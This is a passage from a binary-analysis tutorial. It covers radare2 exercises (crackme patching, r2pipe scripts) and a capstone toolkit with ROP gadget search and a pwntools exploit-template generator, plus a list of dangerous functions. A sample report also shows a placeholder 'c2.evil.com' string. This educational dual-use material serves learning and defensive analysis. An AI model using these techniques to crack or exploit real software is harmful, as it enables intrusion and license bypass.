  1. Command Discovery: How will you learn and remember the hundreds of radare2 commands? Should you create personal cheat sheets, use ? help extensively, or build muscle memory through repetition?

  2. Workflow Efficiency: What’s your standard workflow for analyzing a new binary? Do you start with aaa, then afl, then investigate interesting functions? Or do you prefer a different sequence?

  3. Visual vs Command-Line: When should you use visual mode vs staying in command-line mode? Is visual mode just for beginners, or does it offer unique insights?

  4. Scripting Strategy: Which analysis tasks should you automate with r2pipe vs do manually? At what point does scripting become more efficient than interactive analysis?

  5. Plugin Ecosystem: Should you rely on plugins like r2ghidra (decompiler) and r2dec, or stick to core radare2 functionality? How do plugins affect reproducibility?

  6. Collaborative Analysis: How do you share your radare2 analysis with team members? Do you save projects, export commands, or create scripts?

  7. Integration with Other Tools: How should radare2 fit into your overall RE workflow? Should it complement Ghidra/IDA, or can it be your primary tool?

  8. Learning Curve Management: radare2 is notoriously difficult to learn. How will you structure your learning to avoid frustration: start with small binaries, follow tutorials, or dive into complex samples?

Thinking Exercise

Exercise 1: Manual Command Reconstruction

Before using visual mode, analyze a simple crackme using only command-line mode:

  1. Open the binary: r2 ./crackme
  2. Run analysis: aaa
  3. List functions: afl - identify main and other interesting functions
  4. Seek to main: s main
  5. Print disassembly: pdf
  6. Find string references: iz then axt str.password
  7. Navigate to the xref: s [address]
  8. Trace the check logic without using visual mode

Reflection: Which commands did you use most? What was frustrating? How would you optimize this workflow?

Exercise 2: Visual Mode Mapping

In visual mode, press different keys and observe what happens:

  1. Enter visual mode: V
  2. Press p repeatedly - note each view (hex, disasm, debug, words, etc.)
  3. Press ? - study the help screen
  4. In graph mode (VV), navigate with hjkl and tab through nodes
  5. Return to command mode with q, then recreate one visual operation using CLI commands

Reflection: Which visual mode do you prefer? Can you recreate visual graph mode insights using pdf and agf?

Exercise 3: r2pipe Automation Planning

Manually perform this analysis, then plan how to automate it:

Task: Find all functions that call dangerous functions (strcpy, gets, sprintf)

Manual steps:

r2 ./binary
aaa
afl
s sym.imp.strcpy
axt
# repeat for each dangerous function

Automation plan:

  • What JSON commands will you need? (aflj, axtj)
  • How will you iterate through dangerous functions?
  • What output format will be most useful?
  • Write pseudocode before writing Python
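
One possible shape for the automation, as a minimal sketch rather than a reference solution: it loops over the risky imports and asks radare2 for cross-references in JSON form. The helper names are hypothetical, and the `fcn_name` and `from` keys are assumptions about what axtj emits in your radare2 version, so check them against real output first.

```python
"""Sketch: list functions that call risky libc imports, using r2pipe JSON output."""

DANGEROUS = ("strcpy", "gets", "sprintf")


def find_dangerous_callers(r2, names=DANGEROUS):
    """Map each risky import to the sorted names of functions that reference it.

    `r2` is any object with a cmdj(command) method, such as the handle
    returned by r2pipe.open().
    """
    callers = {}
    for name in names:
        # axtj is expected to return a JSON list of cross-references;
        # treat a missing import (None or empty result) as "no callers".
        xrefs = r2.cmdj(f"axtj @ sym.imp.{name}") or []
        # Assumed keys: "fcn_name" (calling function) and "from" (call site).
        found = {x.get("fcn_name", hex(x.get("from", 0))) for x in xrefs}
        if found:
            callers[name] = sorted(found)
    return callers


def scan(path):
    """Open a binary with radare2, run analysis, and report risky callers."""
    import r2pipe  # imported lazily so the helper above works without radare2

    r2 = r2pipe.open(path)
    try:
        r2.cmd("aaa")
        return find_dangerous_callers(r2)
    finally:
        r2.quit()
```

Passing the handle in as a parameter keeps the lookup logic testable with a stub object, which helps when radare2 is not installed on the machine running the tests.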

Exercise 4: Binary Patching Practice

Find a simple crackme with a password check and practice patching:

  1. Locate the comparison: look for cmp or test before a conditional jump
  2. Understand the logic: does it jump if correct or if incorrect?
  3. Plan your patch: should you NOP the jump, change the condition, or modify the comparison?
  4. Apply the patch: use wa or wx
  5. Verify in-memory: use pd to see your changes
  6. Test: run with ood (open in debug mode)
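  7. Save permanently: with io.cache enabled, commit the cached writes with wci; if the file was opened writable (r2 -w ./crackme, or oo+), wa and wx have already written to disk. Patch a copy of the binary, not the original.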

Reflection: Did your first patch work? What did you learn about instruction lengths and side effects?
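
The instruction-length point can be made concrete outside radare2. The sketch below works on raw bytes and only handles the 2-byte short forms of je/jne (opcodes 0x74 and 0x75); the function names are hypothetical, and `offset` is assumed to be a file offset, not a virtual address.

```python
"""Sketch: patch a short conditional jump in a copy of a binary's bytes."""

NOP = 0x90
JE_SHORT, JNE_SHORT = 0x74, 0x75  # x86 short-jump opcodes, each followed by rel8


def nop_short_jump(data: bytes, offset: int) -> bytes:
    """Replace the 2-byte short je/jne at `offset` with two NOPs."""
    if data[offset] not in (JE_SHORT, JNE_SHORT):
        raise ValueError(f"no short je/jne at offset {offset:#x}")
    patched = bytearray(data)
    # Same length as the original instruction, so nothing after it shifts.
    patched[offset:offset + 2] = bytes([NOP, NOP])
    return bytes(patched)


def invert_short_jump(data: bytes, offset: int) -> bytes:
    """Turn je into jne (or the reverse) by flipping the opcode's low bit."""
    if data[offset] not in (JE_SHORT, JNE_SHORT):
        raise ValueError(f"no short je/jne at offset {offset:#x}")
    patched = bytearray(data)
    patched[offset] ^= 1
    return bytes(patched)


# test eax, eax ; jne +5 ; mov eax, 1 ; ret
code = bytes.fromhex("85c07505b801000000c3")
print(nop_short_jump(code, 2).hex())
print(invert_short_jump(code, 2).hex())
```

Both patches keep the byte count unchanged, which is why they do not disturb relative offsets elsewhere in the function. Near jumps (0x0f 0x8x with a 32-bit displacement) are 6 bytes long and would need their own handling.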

The Interview Questions They’ll Ask

Technical Understanding:

  1. Q: Explain the difference between aa, aaa, and aaaa in radare2. When would you use each? A: They perform progressively deeper analysis: aa does basic analysis (functions, xrefs), aaa adds deeper analysis including strings and function arguments, aaaa is even more aggressive. Use aa for quick checks, aaa for normal analysis, and aaaa when comprehensive analysis is needed.

  2. Q: How would you find all calls to strcpy in a binary using radare2? A: Run aaa to analyze, ii~strcpy to check whether it’s imported, s sym.imp.strcpy to seek to it, then axt to list every cross-reference (call site) to strcpy. Or use r2pipe: r2.cmdj('axtj @ sym.imp.strcpy') for JSON output.

  3. Q: What’s the purpose of the @ operator in radare2 commands? A: The @ operator performs a temporary seek. For example, pdf @ sym.main prints the disassembly of main without changing your current seek position. It’s essential for scripting and avoiding state changes.

  4. Q: How do you patch a binary in radare2 and save the changes permanently? A: Open the file writable (r2 -w ./binary, or oo+ to reopen the current file in read-write mode), then use wa (write assembly) or wx (write hex bytes); the bytes are written to the file directly. If io.cache is enabled, writes stay in the cache until you commit them with wci. Patch a copy so the original stays intact.

  5. Q: Explain the different visual modes in radare2 and when you’d use each. A: V enters visual hex/disassembly (press p to cycle views), VV shows the graph view (control flow), V! enters panel mode (multiple panes). Use hex view for raw bytes, disassembly for linear code, graph for understanding flow, and panels for debugging.

Practical Application:

  1. Q: You’re analyzing a stripped binary with no symbols. How would you find the main function in radare2? A: Run aaa, then s entry0 to go to the entry point, pdf to see the code, look for the call to __libc_start_main which takes main as the first argument (in RDI on x64). Use the disassembly to trace the argument.

  2. Q: How would you use r2pipe to automatically analyze 100 binaries and find which ones have NX disabled? A: Write a Python script that opens each binary with r2pipe.open(), fetches the binary info as JSON with cmdj('iIj'), checks the nx field, and logs results.

  3. Q: A binary crashes when you run it. How do you use radare2 to investigate without executing it? A: Open without execution: r2 ./binary (not r2 -d), run aaa for static analysis, find likely crash points (maybe invalid instruction or null pointer dereference), use pdf to understand context. For dynamic analysis, use doo (reopen in debug mode) and set breakpoints before the crash.
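
The batch NX check from question 2 above might look like the following sketch. The function name is hypothetical, and the opener is passed in as a parameter (normally `r2pipe.open`) so the loop can be exercised without radare2 installed.

```python
"""Sketch: report which binaries have NX disabled, using radare2's iIj output."""


def nx_disabled(paths, open_r2):
    """Return the paths whose binary info reports nx == False.

    `open_r2` is a callable such as r2pipe.open that returns an object
    with cmdj() and quit() methods.
    """
    flagged = []
    for path in paths:
        r2 = open_r2(path)
        try:
            info = r2.cmdj("iIj") or {}
        finally:
            r2.quit()  # always release the radare2 process
        # A missing key is treated as "unknown", not as "disabled".
        if info.get("nx") is False:
            flagged.append(path)
    return flagged
```

A typical call would be `nx_disabled(glob.glob("samples/*"), r2pipe.open)`, where the `samples/` directory is only an example. No analysis pass (aaa) is needed, because iI reads header information only.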

Tool Comparison:

  1. Q: When would you choose radare2 over Ghidra or IDA Pro? A: radare2 excels in: automation via r2pipe, command-line environments (servers, CTFs), binary patching, custom analysis scripts, and open-source requirements. Ghidra is better for decompilation and collaborative projects. IDA has better disassembly quality and commercial support.

  2. Q: How do you use radare2’s JSON output mode, and why is it important? A: Append j to most commands: aflj (functions as JSON), iIj (binary info), axtj (xrefs). This is crucial for r2pipe scripting because parsing JSON is reliable, while parsing text output is fragile.

Books That Will Help

| Topic | Book | Chapters | Why It Helps |
| --- | --- | --- | --- |
| radare2 Fundamentals | “The radare2 Book” (online) | Ch 1-8: Introduction through Patching | Official documentation, comprehensive command reference, essential for learning the tool |
| Command-Line Philosophy | “The Art of UNIX Programming” by Eric S. Raymond | Ch 1: Philosophy, Ch 11: Interfaces | Understand why radare2 is designed the way it is - composable, text-based, scriptable |
| Binary Analysis Concepts | “Practical Binary Analysis” by Dennis Andriesse | Ch 5-6: Basic Binary Analysis, Disassembly | Context for what you’re analyzing - radare2 is the tool, this book explains the concepts |
| Disassembly Fundamentals | “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron | Ch 3: Machine-Level Programming | Understanding what you’re seeing in pdf output - instruction encoding, calling conventions |
| Reverse Engineering Workflow | “Reversing: Secrets of Reverse Engineering” by Eldad Eilam | Ch 4-5: Reverse Engineering, Reversing Tools | Learn systematic RE approaches that you’ll implement in radare2 |
| r2pipe Programming | “The radare2 Book” | Ch 15: r2pipe | Learn to automate radare2 with Python, JavaScript, or other languages |
| Binary Patching | “Hacking: The Art of Exploitation” by Jon Erickson | Ch 3: Exploitation (patching sections) | Understand when and how to modify binaries using radare2’s write commands |
| x86-64 Assembly | “Low-Level Programming” by Igor Zhirkov | Ch 5-8: Assembly Programming | Read disassembly fluently - understand what mov rdi, rsp means in context |
| Control Flow Analysis | “Practical Binary Analysis” by Dennis Andriesse | Ch 6: Binary Analysis (CFG section) | Understand what VV graph mode is showing you - basic blocks, edges, loops |
| Dynamic Analysis Integration | “Practical Malware Analysis” by Sikorski & Honig | Ch 9: Dynamic Analysis | Learn when to use radare2’s debugger (ood, dc, ds) vs static analysis |


Project 18: Complete Binary Analysis Toolkit

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The “Open Core” Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Tool Development / Complete Framework
  • Software or Tool: Your previous projects
  • Main Book: All previous books

What you’ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges you’ll face:

  • Clean architecture → maps to modular, extensible design
  • User experience → maps to helpful output, good CLI
  • Integration → maps to combining all components
  • Documentation → maps to making it usable

Time estimate: 2-3 months

Prerequisites: All previous projects

Real world outcome:

$ binkit analyze ./suspicious
╔═══════════════════════════════════════════════════════════════╗
║                    Binary Analysis Report                     ║
╠═══════════════════════════════════════════════════════════════╣
║ File:     suspicious                                          ║
║ Format:   ELF64                                               ║
║ Arch:     x86-64                                              ║
║ Compiler: GCC 11.2.0                                          ║
╠═══════════════════════════════════════════════════════════════╣
║                       Security                                ║
╠═══════════════════════════════════════════════════════════════╣
║ RELRO:        Full RELRO     ✓                                ║
║ Stack Canary: Found          ✓                                ║
║ NX:           Enabled        ✓                                ║
║ PIE:          Enabled        ✓                                ║
║ Fortify:      Enabled        ✓                                ║
╠═══════════════════════════════════════════════════════════════╣
║                    Vulnerabilities                            ║
╠═══════════════════════════════════════════════════════════════╣
║ ⚠ gets() called at 0x401234 - Buffer overflow risk            ║
║ ⚠ strcpy() called at 0x401456 - No bounds checking            ║
║ ⚠ Format string at 0x401567 - printf(user_input)              ║
╠═══════════════════════════════════════════════════════════════╣
║                    Interesting Strings                        ║
╠═══════════════════════════════════════════════════════════════╣
║ 0x402000: "/bin/sh"                                           ║
║ 0x402008: "http://c2.evil.com"                                ║
║ 0x402020: "password123"                                       ║
╠═══════════════════════════════════════════════════════════════╣
║                      Exploit Template                         ║
╠═══════════════════════════════════════════════════════════════╣
║ Generated: exploit_suspicious.py                              ║
║ Target: gets() overflow at 0x401234                           ║
║ Strategy: ROP chain to system("/bin/sh")                      ║
╚═══════════════════════════════════════════════════════════════╝

$ binkit disasm 0x401234 20
0x00401234: 48 89 e7              mov rdi, rsp
0x00401237: e8 c4 fe ff ff        call 0x401100 <gets@plt>
0x0040123c: 48 85 c0              test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py

Implementation Hints:

Architecture:

binkit/
├── core/
│   ├── parser.py      # ELF/PE parsing (Project 1-2)
│   ├── disasm.py      # Disassembly (Project 3)
│   └── analyzer.py    # Vulnerability detection
├── exploit/
│   ├── rop.py         # ROP chain builder
│   ├── shellcode.py   # Shellcode generation
│   └── templates/     # Exploit templates
├── output/
│   ├── console.py     # Pretty printing
│   └── report.py      # Report generation
└── cli.py             # Command-line interface

Features to implement:

  1. Auto-detect file format
  2. Security check (like checksec)
  3. Vulnerability scanning
  4. ROP gadget finder
  5. Exploit template generator
  6. Report generation

Learning milestones:

  1. Integrate parsers → Support ELF and PE
  2. Add analysis → Vulnerability detection
  3. Build CLI → User-friendly interface
  4. Generate exploits → Automated template creation

The Core Question You’re Answering

How do you architect a comprehensive binary analysis framework that integrates parsing, disassembly, vulnerability detection, and exploit generation into a cohesive, professional tool?

This capstone project synthesizes everything you’ve learned across 17 projects into a unified toolkit. You’ll confront the challenges of software architecture, API design, user experience, and maintainability, the same challenges faced by teams building tools like Binary Ninja, Ghidra, and radare2.

Concepts You Must Understand First

1. Modular Architecture and Plugin Systems

  • Separating concerns into core functionality, plugins, and user interface layers
  • Designing extensible APIs that allow new file formats and analysis techniques
  • Understanding dependency injection and inversion of control patterns

Guiding Questions:

  • How do you make your ELF/PE parsers swappable without changing the analyzer code?
  • What interface should a “file format parser” plugin implement?
  • How can you support future formats (Mach-O, WASM) without rewriting existing code?

Book References:

  • “Clean Architecture” by Robert C. Martin - Chapter 20-22: Architecture Patterns
  • “Design Patterns” by Gang of Four - Chapter 5: Behavioral Patterns (Strategy, Observer)
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

2. Command-Line Interface Design

  • Creating intuitive, composable CLI commands that feel natural to users
  • Balancing power-user features with beginner-friendly defaults
  • Implementing consistent flag patterns and output formats

Guiding Questions:

  • Should binkit analyze show everything by default, or require flags like --full?
  • How do you make output both human-readable and machine-parseable?
  • What’s the right balance between subcommands (binkit disasm) vs flags (binkit --disasm)?

Book References:

  • “The Art of UNIX Programming” by Eric S. Raymond - Chapter 10-11: CLI Design, User Interfaces
  • “The Linux Command Line” by William Shotts - Chapter 24-25: Writing Shell Scripts
  • “Designing Command-Line Interfaces” (online guide)

3. Vulnerability Detection Heuristics

  • Pattern matching for dangerous functions (gets, strcpy, system)
  • Control flow analysis to detect potential exploits (unbounded loops, format strings)
  • Understanding false positives vs false negatives in static analysis

Guiding Questions:

  • How do you detect strcpy usage that might actually be safe (bounded by prior checks)?
  • What’s the difference between a security vulnerability and a code smell?
  • How should you prioritize findings: critical, high, medium, low?

Book References:

  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 6-7: Disassembly, CFG Analysis
  • “The Art of Software Security Assessment” by Dowd, McDonald, Schuh - Chapter 7-8: Program Analysis
  • “Hacking: The Art of Exploitation” by Jon Erickson - Chapter 3-4: Exploitation Techniques
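
The simplest heuristic, pattern matching on dangerous callees, can be sketched as follows. The rule table, severity labels, and the `Finding` type are illustrative assumptions; the input is assumed to be (address, callee name) pairs that your disassembler or analyzer already produced.

```python
"""Sketch: flag calls to risky functions and sort the findings by severity."""
from dataclasses import dataclass

# Hypothetical rule table: function name -> (severity, reason).
RULES = {
    "gets": ("critical", "reads unbounded input"),
    "strcpy": ("high", "copies without a length limit"),
    "sprintf": ("high", "formats into a buffer without a length limit"),
    "system": ("medium", "runs a shell command"),
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass(frozen=True)
class Finding:
    function: str
    address: int
    severity: str
    reason: str


def scan_calls(calls):
    """Turn (address, callee_name) pairs into findings, worst first."""
    findings = [
        Finding(name, addr, *RULES[name])
        for addr, name in calls
        if name in RULES
    ]
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.address))


calls = [(0x401456, "strcpy"), (0x401100, "puts"), (0x401234, "gets")]
for finding in scan_calls(calls):
    print(f"{finding.severity:<9}{finding.function}() at {finding.address:#x}: {finding.reason}")
```

This flags every call regardless of context, so a strcpy guarded by a prior length check is still reported. That is exactly the false-positive problem the guiding questions raise; reachability and bounds analysis would sit on top of a table like this one.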

4. ROP Gadget Finding and Chain Construction

  • Searching binary for useful gadgets (pop/ret, arithmetic, syscall)
  • Understanding gadget constraints (bad bytes, alignment, clobbering)
  • Automating ROP chain construction based on target objectives

Guiding Questions:

  • How do you find gadgets that pop multiple registers in sequence?
  • What’s the algorithm for searching a binary for pop rdi; ret patterns?
  • How do you handle position-independent executables (PIE) when building ROP chains?

Book References:

  • “The Shellcoder’s Handbook” by Anley et al. - Chapter 7: Return-Oriented Programming
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 11: Principles of Dynamic Analysis
  • “Hacking: The Art of Exploitation” by Jon Erickson - Chapter 3: Exploitation
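
For a fixed pattern such as pop rdi; ret (bytes 5f c3), a raw byte search is enough. The sketch below assumes `code` holds the bytes of one executable section and `base` is that section's load address; the function names are hypothetical, and a full gadget finder would also disassemble backwards from every ret.

```python
"""Sketch: find fixed-byte gadgets and filter addresses containing bad bytes."""
import struct

POP_RDI_RET = bytes.fromhex("5fc3")  # pop rdi ; ret


def find_gadgets(code: bytes, pattern: bytes, base: int = 0):
    """Yield the address of every occurrence of `pattern` in `code`.

    Unaligned matches are kept on purpose: x86 instructions have no
    alignment rule, so a gadget may start inside another instruction.
    """
    start = code.find(pattern)
    while start != -1:
        yield base + start
        start = code.find(pattern, start + 1)


def usable(address: int, bad_bytes: bytes = b"\n") -> bool:
    """True if the packed 64-bit address contains none of `bad_bytes`."""
    return not any(byte in bad_bytes for byte in struct.pack("<Q", address))


# 41 5f c3 is "pop r15 ; ret"; skipping the 41 prefix gives "pop rdi ; ret".
section = bytes.fromhex("415fc3" "90" "5fc3")
gadgets = [addr for addr in find_gadgets(section, POP_RDI_RET, 0x401000) if usable(addr)]
print([hex(addr) for addr in gadgets])
```

The default bad byte is a newline because input read by gets() stops there; other input functions impose different constraints. For PIE binaries the addresses found this way are offsets from an unknown base, so `base` has to come from a leak at exploit time.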

5. Exploit Template Generation

  • Creating reusable pwntools templates for common vulnerabilities
  • Parameterizing exploits for different targets (local, remote, different libcs)
  • Generating descriptive comments that explain the exploit strategy

Guiding Questions:

  • How do you auto-generate the offset calculation for a buffer overflow?
  • What information should your template include: libc version, gadget addresses, shellcode?
  • How can you make the generated exploit educational, not just functional?

Book References:

  • pwntools documentation - “Getting Started” and “Exploit Templates”
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 12: Dynamic Analysis
  • CTF101 Binary Exploitation Guide (online)
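
A template generator can be as small as a string template filled in from analysis results. The sketch below emits a pwntools script skeleton; `process`, `ELF`, `flat`, and `context.binary` are pwntools names, while the template layout, the parameter names, and the TODO placeholders are assumptions for illustration. The generated script is intentionally incomplete.

```python
"""Sketch: render a commented pwntools exploit skeleton from analysis results."""
from string import Template

EXPLOIT_TEMPLATE = Template('''\
#!/usr/bin/env python3
# Generated template for $binary: $vuln at $vuln_addr
from pwn import *

context.binary = elf = ELF("$binary")
OFFSET = $offset  # bytes from the buffer start to the saved return address

io = process(elf.path)
payload = flat({OFFSET: [
    $pop_rdi,  # pop rdi ; ret
    # TODO: address of "/bin/sh", then address of system()
]})
io.sendline(payload)
io.interactive()
''')


def render_exploit(binary, vuln, vuln_addr, offset, pop_rdi):
    """Fill the template; addresses are written as hex literals."""
    return EXPLOIT_TEMPLATE.substitute(
        binary=binary,
        vuln=vuln,
        vuln_addr=hex(vuln_addr),
        offset=offset,
        pop_rdi=hex(pop_rdi),
    )
```

Calling `render_exploit("./suspicious", "gets() overflow", 0x401234, 72, 0x401001)` returns the script text to write to pwn.py; the offset 72 and the gadget address are made-up values here. Keeping the comments in the template is what makes the generated file educational as well as functional.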

6. Report Generation and Output Formatting

  • Creating clear, actionable security reports for different audiences
  • Balancing technical detail with executive summaries
  • Using visual elements (ASCII art, color coding) for clarity

Guiding Questions:

  • What should a security report include: executive summary, technical details, recommendations?
  • How do you visualize a ROP chain or control flow in a text report?
  • Should your tool output JSON for integration with other tools?

Book References:

  • “The Art of Software Security Assessment” by Dowd, McDonald, Schuh - Chapter 2: Design Review
  • “Writing for Computer Science” by Justin Zobel - Chapter 3-4: Technical Writing
  • “Beautiful Code” by Oram & Wilson - Chapter 17: Pretty-Printing
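
One way to serve both humans and other tools is to keep the analysis result as plain data and attach renderers to it. In this sketch the report layout (the `file`, `security`, and `findings` keys) is a hypothetical schema, not a fixed format.

```python
"""Sketch: render one report dictionary as either JSON or console text."""
import json


def render_json(report):
    """Machine-readable form; sorted keys keep diffs stable between runs."""
    return json.dumps(report, indent=2, sort_keys=True)


def render_console(report):
    """Human-readable form built from the same dictionary."""
    lines = [f"File: {report['file']}", "Security:"]
    for name, enabled in report["security"].items():
        lines.append(f"  {name:<14}{'enabled' if enabled else 'DISABLED'}")
    lines.append("Findings:")
    for finding in report["findings"]:
        lines.append(
            f"  [{finding['severity']}] {finding['function']}() at {finding['address']}"
        )
    return "\n".join(lines)


RENDERERS = {"json": render_json, "console": render_console}


def render(report, fmt="console"):
    """Dispatch to the renderer registered for `fmt`."""
    if fmt not in RENDERERS:
        raise ValueError(f"unknown format: {fmt}")
    return RENDERERS[fmt](report)
```

Adding HTML or SARIF output then means registering one more function in `RENDERERS`, without touching the analysis code.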

7. Testing and Quality Assurance

  • Unit testing binary parsers with malformed inputs
  • Integration testing the full analysis pipeline
  • Creating a test corpus of diverse binaries

Guiding Questions:

  • How do you test your ELF parser against malicious/malformed files?
  • What binaries should be in your test suite: simple, complex, obfuscated, different architectures?
  • How do you verify that your vulnerability detection doesn’t have false negatives?

Book References:

  • “The Art of Software Testing” by Glenford Myers - Chapter 2-3: Test Case Design
  • “Working Effectively with Legacy Code” by Michael Feathers - Chapter 9-10: Dependency Breaking
  • “Practical Binary Analysis” by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

Questions to Guide Your Design

  1. User-Centric Design: Who is your target user: CTF players, security researchers, malware analysts? How does this affect feature priorities?

  2. Scope Creep: Which features are essential for v1.0, and which can wait? Should you support Windows PE and Linux ELF initially, or just one?

  3. Performance vs Accuracy: Should vulnerability detection be fast and approximate, or slow and precise? How do you let users choose?

  4. Integration Philosophy: Should your tool replace existing tools (pwntools, checksec, ropper), or complement them? Do you wrap existing tools or reimplement?

  5. Output Flexibility: How do you support different output formats (JSON, XML, HTML, PDF) without duplicating logic?

  6. Extensibility vs Simplicity: Do you build a plugin system from day one, or start simple and refactor later?

  7. Error Handling: When analyzing a malformed binary, should you fail fast or attempt best-effort analysis?

  8. Distribution Strategy: How will users install your tool: pip, git clone, Docker? Does this affect your architecture?

Thinking Exercise

Exercise 1: Architecture Design Session

Sketch the high-level architecture of your toolkit:

Input Layer          Core Layer              Output Layer
[Binary File] --> [Parser] --> [Analyzer] --> [Report Generator]
                      |            |              |
                   [Plugin        [Vuln        [Console/
                    System]      Detector]      JSON/HTML]

Questions to answer:

  • What data flows between components?
  • Where do you store intermediate results (AST, CFG, symbol table)?
  • How do components communicate: function calls, message passing, shared state?

Exercise 2: API Design

Design the Python API for your toolkit:

from binkit import Binary

# How should users interact with your tool?
binary = Binary.load('suspicious.elf')
binary.analyze()  # or .parse(), .disassemble()?
vulns = binary.find_vulnerabilities()
report = binary.generate_report(format='json')

# Alternative API?
from binkit import analyze
result = analyze('suspicious.elf', depth='full', output='json')

Reflection: Which API is more intuitive? More flexible? Easier to test?

Exercise 3: Test-Driven Development

Before writing code, write test cases:

def test_elf_parser_handles_32bit():
    binary = Binary.load('test_binaries/hello_32.elf')
    assert binary.arch == 'i386'
    assert binary.bits == 32

def test_detects_buffer_overflow():
    binary = Binary.load('test_binaries/bof.elf')
    vulns = binary.find_vulnerabilities()
    assert any(v.type == 'buffer_overflow' for v in vulns)

Reflection: What edge cases should you test? How do you get test binaries?
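
One answer to the test-binary question is to build inputs in the test itself. The sketch below packs a bare 64-byte ELF64 header with `struct` (field order follows the Elf64_Ehdr layout) and pairs it with a deliberately tiny parser to test against; both function names are hypothetical and the stub has no program or section headers, so it is only useful for header-level tests.

```python
"""Sketch: generate a minimal ELF64 header in memory for parser tests."""
import struct

ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")  # little-endian Elf64_Ehdr
EM_386, EM_X86_64 = 3, 62


def make_elf64_header(machine=EM_X86_64, entry=0x401000):
    """Return 64 bytes that look like the start of an ELF64 executable."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)  # 64-bit, LSB, version 1
    return ELF64_HEADER.pack(
        ident,
        2,                  # e_type: ET_EXEC
        machine,            # e_machine
        1,                  # e_version
        entry,              # e_entry
        0, 0,               # e_phoff, e_shoff (no tables in this stub)
        0,                  # e_flags
        ELF64_HEADER.size,  # e_ehsize
        0, 0, 0, 0, 0,      # e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )


def parse_elf64_header(data: bytes) -> dict:
    """Tiny stand-in parser: rejects anything that is not a full ELF64 header."""
    if len(data) < ELF64_HEADER.size or data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not a complete ELF64 header")
    fields = ELF64_HEADER.unpack_from(data)
    return {"machine": fields[2], "entry": fields[4]}
```

Truncating or corrupting the generated bytes (for example `make_elf64_header()[:10]`) gives cheap malformed-input cases without keeping binary fixtures in the repository. Real compiled binaries are still needed for anything beyond the header.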

Exercise 4: CLI Mockup

Design the command-line interface on paper before coding:

# Option 1: Subcommands
binkit parse binary.elf
binkit analyze binary.elf --checks=all
binkit exploit binary.elf --output=pwn.py

# Option 2: Flags
binkit binary.elf --parse --analyze --exploit

# Option 3: Swiss Army Knife
binkit binary.elf  # does everything
binkit binary.elf --quick  # fast scan only

Reflection: Which design is most intuitive? Try explaining it to a colleague.
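
Option 1 (subcommands) maps directly onto argparse subparsers. This is a minimal sketch under a few assumptions: the flag names are illustrative, and unlike the earlier sample session, `disasm` here takes the binary path as its first argument.

```python
"""Sketch: subcommand-style CLI for binkit using argparse."""
import argparse


def build_parser():
    parser = argparse.ArgumentParser(prog="binkit")
    sub = parser.add_subparsers(dest="command", required=True)

    analyze = sub.add_parser("analyze", help="run security checks")
    analyze.add_argument("binary")
    analyze.add_argument("--checks", default="all")
    analyze.add_argument("--json", action="store_true", help="machine-readable output")

    disasm = sub.add_parser("disasm", help="disassemble from an address")
    disasm.add_argument("binary")
    # int(s, 0) accepts both 0x401234 and decimal input.
    disasm.add_argument("address", type=lambda s: int(s, 0))
    disasm.add_argument("count", type=int, nargs="?", default=20)

    exploit = sub.add_parser("exploit", help="write an exploit template")
    exploit.add_argument("binary")
    exploit.add_argument("--output", default="pwn.py")
    return parser


if __name__ == "__main__":
    print(build_parser().parse_args())
```

Each subcommand gets its own help text and its own flags, which keeps `binkit analyze --help` short. The flag-based and do-everything designs can still be layered on later by giving the top-level parser a default command.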

The Interview Questions They’ll Ask

Architecture and Design:

  1. Q: How would you design a plugin system for supporting new binary formats? A: Define an abstract base class BinaryParser with methods like parse(), get_sections(), get_symbols(). Each format (ELF, PE, Mach-O) implements this interface. Use a registry pattern to discover and load parsers at runtime.

  2. Q: Your vulnerability detector has many false positives. How do you improve it? A: Implement context-aware analysis: check if dangerous functions are actually reachable, if input is validated beforehand, if buffers are properly bounds-checked. Add confidence scores to findings. Allow users to suppress false positives with configuration files.

  3. Q: How do you handle large binaries (100MB+) efficiently? A: Implement lazy loading: parse headers immediately, but only disassemble/analyze sections on-demand. Use generators instead of loading entire disassembly into memory. Consider caching analysis results to disk.
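
The abstract-base-class-plus-registry answer from question 1 above could be sketched like this. `BinaryParser` and `get_sections` follow the names used in that answer; `register`, `accepts`, `load`, and the stub `ElfParser` are hypothetical additions.

```python
"""Sketch: parser plugins registered through a decorator and chosen at load time."""
from abc import ABC, abstractmethod

PARSERS = []  # registry, filled by the decorator below


def register(cls):
    """Class decorator that adds a parser to the registry."""
    PARSERS.append(cls)
    return cls


class BinaryParser(ABC):
    def __init__(self, data: bytes):
        self.data = data

    @classmethod
    @abstractmethod
    def accepts(cls, data: bytes) -> bool:
        """Return True if this parser recognizes the file."""

    @abstractmethod
    def get_sections(self) -> list:
        """Return the sections found in the file."""


@register
class ElfParser(BinaryParser):
    @classmethod
    def accepts(cls, data):
        return data[:4] == b"\x7fELF"

    def get_sections(self):
        return []  # stub: the real parsing lives in the ELF parser project


def load(data: bytes) -> BinaryParser:
    """Instantiate the first registered parser that accepts the data."""
    for cls in PARSERS:
        if cls.accepts(data):
            return cls(data)
    raise ValueError("unsupported binary format")
```

The analyzer only ever calls `load()` and the `BinaryParser` methods, so adding Mach-O or WASM support means writing one new decorated class and nothing else.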

Technical Implementation:

